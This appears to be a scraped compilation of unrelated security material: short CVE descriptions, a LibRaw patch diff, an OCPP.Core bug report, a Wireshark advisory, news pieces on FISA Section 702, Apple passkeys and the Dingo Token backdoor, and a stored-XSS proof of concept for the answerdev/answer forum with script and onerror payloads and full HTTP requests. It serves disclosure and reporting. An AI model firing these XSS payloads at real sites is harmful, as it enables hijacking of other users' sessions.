The Intuitive Custom Post Order WordPress plugin before 3.1.4 does not check for authorization in the update-menu-order ajax action, allowing any logged in user (with roles as low as Subscriber) to update the menu order

CVE-2022-4385

The Lock User Account WordPress plugin through 1.0.3 does not have CSRF check when bulk locking and unlocking accounts, which could allow attackers to make logged in admins lock and unlock arbitrary users via a CSRF attack

CVE-2023-4307

Buffer Overflow vulnerability in LibRaw linux/unix v0.20.0 allows attacker to escalate privileges via the LibRaw_buffer_datastream::gets(char*, int) in /src/libraw/src/libraw_datastream.cpp.

@@ -287,6 +287,7 @@ INT64 LibRaw\_file\_datastream::tell()

  

char \*LibRaw\_file\_datastream::gets(char \*str, int sz)

{

if(sz<1) return NULL;

LR\_STREAM\_CHK();

std::istream is(f.get());

is.getline(str, sz);

@@ -421,6 +422,7 @@ INT64 LibRaw\_buffer\_datastream::tell()

  

char \*LibRaw\_buffer\_datastream::gets(char \*s, int sz)

{

if(sz<1) return NULL;

unsigned char \*psrc, \*pdest, \*str;

str = (unsigned char \*)s;

psrc = buf + streampos;

@@ -618,6 +620,7 @@ INT64 LibRaw\_bigfile\_datastream::tell()

  

char \*LibRaw\_bigfile\_datastream::gets(char \*str, int sz)

{

if(sz<1) return NULL;

LR\_BF\_CHK();

return fgets(str, sz, f);

}

CVE-2021-32142: check for input buffer size on datastream::gets · LibRaw/LibRaw@bc3aaf4

In wlan service, there is a possible out of bounds read due to improper input validation. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07460540; Issue ID: ALPS07460540.

CVE-2023-20818: August 2023

An issue was discovered in Dalmann OCPP.Core before 1.3.0 for OCPP (Open Charge Point Protocol) for electric vehicles. It permits multiple transactions with the same connectorId and idTag, contrary to the expected ConcurrentTx status. This could result in critical transaction management and billing errors. NOTE: the vendor's perspective is "Imagine you've got two cars in your family and want to charge both in parallel on the same account/token? Why should that be rejected?"

**Issue Description**:  
The current implementation of the OCPP server does not adhere to the specified behavior in the OCPP documentation regarding concurrent transactions. The documentation states that if an idTag is already involved in an active transaction, any attempt to initiate a new transaction with the same idTag should result in an AuthorizationStatus of ConcurrentTx. However, I've observed two issues:

1.  The server allows initiation of multiple transactions using the same idTag without the ConcurrentTx status.
2.  A StopTransaction message with a random transactionId can stop the current transaction.

**Steps to Reproduce**:

1.  Send a StartTransaction message using a specific idTag.
2.  While the transaction is active, send another StartTransaction message with the same idTag.
3.  Observe that the server does not return an AuthorizationStatus of ConcurrentTx.
4.  Send a StopTransaction message with a random transactionId.
5.  Note that the server stops the most recent transaction.

**Expected Behavior**:  
In compliance with the OCPP specification, the server should not allow a new transaction to start with an idTag that is already in use for an ongoing transaction. The server should issue an AuthorizationStatus of ConcurrentTx.

**Actual Behavior**:  
Multiple transactions are allowed for the same idTag without returning a ConcurrentTx status, and transactions can be stopped using random transactionIds.

**Potential Impact**:  
This could cause a critical error in transaction management and billing processes, affecting operational integrity.

**Suggested Solution**:

*   Update the server logic to return an AuthorizationStatus of ConcurrentTx for StartTransaction requests that involve an idTag in an ongoing transaction.
*   Validate transactionId in StopTransaction requests to ensure the correct transaction is being stopped.

Best regards,  
Gaetano Coppoletta

CVE-2023-49957: Multiple Transactions Allowed with Same connectorId and idTag · Issue #35 · dallmann-consulting/OCPP.Core

In Wireshark 2.4.0 to 2.4.13, 2.6.0 to 2.6.7, and 3.0.0, the DCERPC SPOOLSS dissector could crash. This was addressed in epan/dissectors/packet-dcerpc-spoolss.c by adding a boundary check.

**Summary**

**Name:** DCERPC SPOOLSS dissector crash

**Docid:** wnpa-sec-2019-18

**Date:** April 8, 2019

**Affected versions:** 3.0.0, 2.6.0 to 2.6.7, 2.4.0 to 2.4.13

**Fixed versions:** 3.0.1, 2.6.8, 2.4.14

**References:**

Wireshark issue 15568.  
CVE-2019-10903.

**Details****Description**

The DCERPC SPOOLSS dissector could crash. Discovered by Mateusz Jurczyk.

**Impact**

It may be possible to make Wireshark crash by injecting a malformed packet onto the wire or by convincing someone to read a malformed packet trace file.

**Resolution**

Upgrade to Wireshark 3.0.1, 2.6.8, 2.4.14 or later.

CVE-2019-10903: Wireshark • wnpa-sec-2019-18 DCERPC SPOOLSS dissector crash

One of Silicon Valley’s most influential lobbying arms joins privacy reformers in a fight against the Biden administration–backed expansion of a major US surveillance program.

A trade organization representing some of the world’s largest information technology companies—Google, Amazon, IBM, and Microsoft among them—say its members are voicing strong opposition to ongoing efforts by the Biden administration to dramatically expand a key US government surveillance authority.

The US Senate is poised to vote Thursday on legislation that would extend a global wiretap program authorized under the Foreign Intelligence Surveillance Act (FISA). Passed by the House of Representatives last week, a provision contained in the bill—known as the Reforming Intelligence and Securing America Act (RISAA)—threatens to significantly expand the scope of the spy program, helping the government to compel the assistance of whole new categories of businesses.

Legal experts argue the provision could enable the government to conscript virtually anyone with access to facilities or equipment housing communications data, forcing “delivery personnel, cleaning contractors, and utilities providers,” among others, to assist US spies in acquiring access to Americans’ emails, phone calls, and text messages—so long as one side of the communication is foreign.

A global tech trade association, the Information Technology Industry Council (ITI), is now urging Congress not to pass RISAA without removing a key provision “dramatically expanding the scope of entities and individuals covered” by the program, known as Section 702. Changes to the 702 program included in the House bill, ITI says, would only serve to send customers in the US and abroad fleeing to foreign competitors, convincing many that technology in the US is far too exposed to government surveillance.

The group’s membership includes several major equipment manufacturers, such as Ericsson, Nokia, and Broadcom, as well as large cloud storage providers like Google, Microsoft, IBM, and Salesforce. “ITI’s position is that the provision should be removed,” the group’s communications director, Janae Washington, tells WIRED. “Our positions are based on member consensus.”

The individual ITI member companies WIRED contacted for their comment on the legislation did not immediately respond or declined to comment.

The provision under fire stems from a ruling handed down by the US government’s secret surveillance court—the FISA court—that oversees the 702 program. The program is designed to target the communications of foreigners, including calls and emails to and from US citizens. To this aim, the federal statute specifies that the government may compel the assistance of businesses that fall into the category of what it calls “electronic communications service providers,” or ECSPs.

Companies like Google and AT&T have typically fallen into this category as direct providers of the services being wiretapped; however, the US government has also moved in recent years to interpret the term more broadly as part of an effort to expand the roster of entities whose assistance it’s allowed to compel.

The FISA court, in a decision backed by its own review body, pushed back against the expanded definition, telling the government that what constitutes an ECSP remains “open to reconsideration by the branches of government whose competence and constitutional authority extend to statutory revision.”

More concisely: The court reminded the government that only Congress has the power to rewrite the law.

The US Intelligence Community (IC) thus began a campaign to ensure that this year’s legislation reauthorizing the 702 program redefines “ECSP” to address what it calls a “collection gap resulting from recent court opinions.”

Internal emails obtained by WIRED show that members of the House Intelligence Committee served as intermediaries for the IC in its campaign to convince Congress to support the provision. An email circulated to House members in February by Michael Calcagni, the intel committee’s deputy staff director, for instance, informed lawmakers that the “collection gap” was both “serious and dangerous” and that “contrary to unsubstantiated assertions, it would not authorize or enable the Government to conduct surveillance of any American who connects to public WiFi at a Starbucks or McDonalds.”

One of the nation’s leading FISA experts, Marc Zwillinger, a private attorney who has twice appeared before the FISA Court of Review, began raising the alarm in December over the provision, pointing to text that would allow the government to compel the assistance of “any service provider” with access to “equipment that is being or may be used to transmit or store” communications, so long as one of the recipients is a foreigner reasonably believed to be overseas.

While rejecting Zwillinger’s analysis publicly, House intel members nevertheless attempted to quietly “narrow” the provision to clamp down on any criticism, excluding a handful of business types such as senior centers, hotels, and coffee shops. In a follow-up last week, Zwillinger and other attorneys who’ve made rare appearances before the FISA court characterized the intel committee’s improvements as “marginal,” saying the need for the exclusions only served to demonstrate the government is overreaching.

The provision, Zwillinger says, continues to ensnare owners and operators of facilities housing equipment used to store and carry data, “such as data centers and buildings owned by commercial landlords, who merely have access to communications equipment in their physical space.” The text could be interpreted to extend to “delivery personnel, cleaning contractors, and utility providers.” And while the new provision excludes businesses like coffee shops, those businesses typically rely on cloud computer services whose equipment remains subject to the 702 program’s expanded scope.

“Although the effects of this provision may be unintentional, its impacts would be very real,” ITI’s senior vice president of policy, John Miller, says. “The language in the provision vastly expands the US government’s warrantless surveillance capabilities, damaging the competitiveness of US technology companies large and small, and arguably imperiling the continued global free flow of data between the US and its allies.”

Should it become apparent to the world that America’s top IT companies—data centers, cloud providers, and security services alike—have been turned into a watering hole for the US Intelligence Community, many customers will “likely look to foreign competitors,” Miller says, companies whose technologies are viewed as less exposed to clandestine government requests.

“There is no greater responsibility of the US government than to provide for the security of the country,” he says, adding it was incumbent upon to craft legislation to address national security concerns “in a focused way.”

_Updated 4/17/2024, 6:30 pm ET: Added additional details clarifying ITI's position on RISAA._

Big Tech Says Spy Bill Turns Its Workers Into Informants

Categories: Apple
Categories: News
With the introduction of passkeys in iOS 16 and macOS Ventura, Apple is poised to sway a trend against the use of passwords.



(Read more...)




The post Apple puts the password on life support with passkey appeared first on Malwarebytes Labs.

Posted: September 13, 2022 by

The "passwordless future" is something many internet users—and a great majority of the cybersecurity industry—have hoped for. Now Apple is about to make those hopes a reality.

With the release of iOS 16 yesterday, and macOS Ventura next month, Apple fans will be able to use passkeys, its password replacement, for iPhones, iPads, and Macs. The word "passkey" is not unique to Apple, however. Microsoft and Google are using the term, too.

Apple's passkey works like a password in that it is built into entry boxes where you put your password. It also acts as a digital key that users create to access their apps or websites.

A video demonstrating passkey's use in Apple's WWDC 2022 event shows a prompt on the user's device before sign-in or during account creation, asking if they would like to "save a passkey" for the account in use. Once users say yes, they are prompted to authenticate the passkey creation using Face ID, Touch ID, or another method. The created passkey is stored in the user's iCloud Keychain and synced across all Apple devices and Safari web browsers.

Whenever a passkey is created, the device's system creates a pair of digital keys: public and secret keys. According to Garrett Davidson, an Apple engineer, in the demo video, these keys are created "securely and uniquely" for every account. The public key is stored on Apple's servers, while the secret key is kept on the device.

When signing in to an account protected by a passkey, the website or app looks for the secret key kept safe on the device to prove that the user is who the user claims they are. And because Apple's passkey is based on passwordless standards defined by the FIDO Alliance, it's likely the passkey can be stored anywhere, including some password managers with a provision for the passkey, such as Dashlane.

Those with other devices besides Apple can still take advantage of passkey. However, how things are done is slightly different because passkeys won't be stored on non-Apple devices. For example, accessing a browser account on a Windows machine would require a user to use a QR code containing a URL to a single-use encryption key and their iPhone. Once scanned, the machine and the device can communicate using end-to-end encryption via Bluetooth and share information.

"That means a QR code sent in an email or generated on a fake website won't work, because a remote attacker won't be able to receive the Bluetooth advertisement and complete the local exchange," Davidson said in the video.

"This has the potential to be _far_ superior to weak passwords and chosen by people who don't use a password manager or don't know how to choose a password," said Thomas Reed, Malwarebytes' Director for Mac & Mobile. "So even if this isn't 100% perfect, it's still going to be better than what most people are doing today."

**RELATED ARTICLES**

Apple puts the password on life support with passkey

Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.7.

**Description**

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

**Proof of Concept**

Posting the Question:

    func (req *QuestionAdd) Check() (errFields []*validator.FormErrorField, err error) {
        req.HTML = converter.Markdown2HTML(req.Content)
        for _, tag := range req.Tags {
            if len(tag.OriginalText) > 0 {
                tag.ParsedText = converter.Markdown2HTML(tag.OriginalText)
            }
        }
        return nil, nil
    }
    

Updating the Question:

    func (req *QuestionUpdate) Check() (errFields []*validator.FormErrorField, err error) {
        req.HTML = converter.Markdown2HTML(req.Content)
        return nil, nil
    }
    

Posting the Answer:

    func (req *AnswerAddReq) Check() (errFields []*validator.FormErrorField, err error) {
        req.HTML = converter.Markdown2HTML(req.Content)
        return nil, nil
    }
    

Updating the Answer:

    func (req *AnswerUpdateReq) Check() (errFields []*validator.FormErrorField, err error) {
        req.HTML = converter.Markdown2HTML(req.Content)
        return nil, nil
    }
    

Updating the Tag:

    func (r *UpdateTagReq) Check() (errFields []*validator.FormErrorField, err error) {
        if len(r.EditSummary) == 0 {
            r.EditSummary = "tag.edit.summary"
        }
        r.ParsedText = converter.Markdown2HTML(r.OriginalText)
        return nil, nil
    }
    

Addning a comment:

    func (req *AddCommentReq) Check() (errFields []*validator.FormErrorField, err error) {
        req.ParsedText = converter.Markdown2HTML(req.OriginalText)
        return nil, nil
    }
    

Updating a Comment:

    func (req *UpdateCommentReq) Check() (errFields []*validator.FormErrorField, err error) {
        req.ParsedText = converter.Markdown2HTML(req.OriginalText)
        return nil, nil
    }
    

Payload:

    <script>alert(1)<\\x00/script>
    <style></style><img src=x onerror=alert(1)//>
    

Request @ Question:

    POST /answer/api/v1/question HTTP/1.1
    Host: localhost:9080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
    Accept: */*
    Accept-Language: en_US
    Accept-Encoding: gzip, deflate
    Authorization: 13215c73-bced-11ed-bdbe-0242ac110002
    Content-Type: application/json
    Content-Length: 213
    Origin: http://localhost:9080
    Connection: close
    Referer: http://localhost:9080/questions/ask
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"title":"question","content":"<script>alert(1)<\\\\x00/script>\n<style></style><img src=x onerror=alert(1)//>","tags":[{"original_text":"","parsed_text":"","slug_name":"nano","recommend":false,"reserved":false}]}
    

Request @ Answer:

    POST /answer/api/v1/post/render HTTP/1.1
    Host: localhost:9080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
    Accept: */*
    Accept-Language: en_US
    Accept-Encoding: gzip, deflate
    Authorization: 13215c73-bced-11ed-bdbe-0242ac110002
    Content-Type: application/json
    Content-Length: 95
    Origin: http://localhost:9080
    Connection: close
    Referer: http://localhost:9080/questions/10010000000000007
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"content":"<script>alert(1)<\\\\x00/script>\n<style></style><img src=x onerror=alert(1)//>\n"}
    

Request @ Tag:

    PUT /answer/api/v1/tag HTTP/1.1
    Host: localhost:9080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
    Accept: */*
    Accept-Language: en_US
    Accept-Encoding: gzip, deflate
    Authorization: 13215c73-bced-11ed-bdbe-0242ac110002
    Content-Type: application/json
    Content-Length: 272
    Origin: http://localhost:9080
    Connection: close
    Referer: http://localhost:9080/tags/10030000000000002/edit
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"display_name":"a","slug_name":"a","original_text":"<script>alert(1)<\\\\x00/script>\n<style></style><img src=x onerror=alert(1)//>","parsed_text":"<style></style><img src=x onerror=alert(1)//><blockquote>\n</blockquote>\n","tag_id":"10030000000000002","edit_summary":""}
    

Request @ Comment:

    POST /answer/api/v1/comment HTTP/1.1
    Host: localhost:9080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
    Accept: */*
    Accept-Language: en_US
    Accept-Encoding: gzip, deflate
    Authorization: 1d798f13-bda1-11ed-9586-0242ac110002
    Content-Type: application/json
    Content-Length: 158
    Origin: http://localhost:9080
    Connection: close
    Referer: http://localhost:9080/questions/10010000000000012/nadahh
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"object_id":"10020000000000015","original_text":"<script>alert(1)<\\\\x00/script>\n<style></style><img src=x onerror=alert(1)//>","mention_username_list":[]}
    

**Impact**

The application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, the dangerous data is subsequently read back into the application and included in dynamic content. From an attacker's perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs.

CVE-2023-1535: Multiple XSS @ answer/question/tag in answer

A tax variable in the software implementing the Dingo Token allows the creators to charge 99% in fees per transaction, essentially stealing funds, an analysis finds.

The originator of the Dingo Token — a cryptocurrency with a purported market capitalization of $11 million — has included a backdoor in the code to charge each transaction a fee of up to 99% of the worth of the token.

That's according to cybersecurity firm Check Point Software, which has issued an advisory warning potential investors of what the company calls "a scam." 

While the documents describing the Dingo Token claimed that the scheme charged 10% per transaction, Check Point researchers found 47 transactions where the total fee per transaction had been increased to 99%. The creator had also set the fee to 99% for future transactions, essentially stealing the funds of any traders of the cryptocurrency, according to the analysis published this week.

The Dingo Token creator has already transferred previously collected funds to other accounts, leaving no money for anyone holding Dingo tokens, says Oded Vanunu, head of products vulnerabilities research at Check Point Software.

"The function was called many times by the owners to prevent users from selling their holdings," he says.

Cryptocurrencies are heavily based on mathematics but also on good marketing, a dose of libertarian ideals, and an influx of gray market cash. Overall, hundreds of cryptocurrencies have been created, and not all will be legitimate, nor will they be free of fraud. In a 2019 report, for example, Alameda Research uncovered significant fraud in many crypto exchanges. That's ironic, given that two years later the firm and its sister company, cryptocurrency exchange FTX, had both declared bankruptcy, and their executives, including FTX and Alameda co-founder Sam Bankman-Fried, have been charged with numerous financial crimes.

While those efforts may have started as legitimate businesses, the Dingo Token scheme likely started as fraud from the start, Check Point stated in its analysis.

"We examined the Dingo smart contract and quickly found it seemed like a scam," the company stated. "The project website contains no real information about the owners of the projects."

**A Quick Jump in Popularity**

While the Dingo Token is far down the lists of popular cryptocurrencies — No. 774, at the time Check Point released its advisory — transactions using the currency had jumped 8,400% in the past year, according to the cybersecurity firm. The meteoric rise in popularity, along with the fact that the description of the cryptocurrency was limited, raised suspicions, leading to Check Point analyzing the digital smart contract on which the token is based.

The analysis uncovered systematic theft of traders' funds, using a variable called "TaxFee" to set the amount to take from each transaction. 

"We don’t believe that it was a mistake due to the nature of crypto-scam projects," Vanunu says. "In this case, \[the\] _setTaxFeePercent_ function code...operates as a backdoor, \[allowing\] the owner to change the fee dynamically, which is not best practice for legitimate projects."

The fake cryptocurrency scheme may be the most technical attack yet, but fraud is increasingly a hazard for cryptocurrency investors and users, surging after a hiatus following numerous cryptocurrencies plunging in value by more than 60%. In 2022, for example, the FBI warned that cryptocurrency scams had once again targeted businesses and consumers, this time with fake investment apps that led to the theft of more than $40 million.

**Know Your Code**

The Dingo Token incident highlights the fact that companies need to conduct due diligence on any cryptocurrency in which they plan to use or allow customers to use. Security gaps, such as the backdoor code used by Dingo Token, need to be identified and cryptocurrency investors need more education on the risks, Vanunu says.

"We recommend that users only use known exchanges and buy from a known token that has several transactions behind it," he says. "In the near future, we believe that more preventative solutions will be available for users to deal with these cyber threats."

The Dingo Token creators did not respond to a request for comment sent to their contact email address by publication time. Check Point believes the creators are gone, but more scams will likely appear to take its place.

"It is important for consumers to be careful with the tokens they buy," the company stated in the analysis, adding that "cryptocurrency is a volatile market. Scammers will always find new ways to steal your money using cryptocurrency, and new forms of crypto are constantly being minted."

Search

lenovo warranty check/lookup | check warranty status | lenovo support us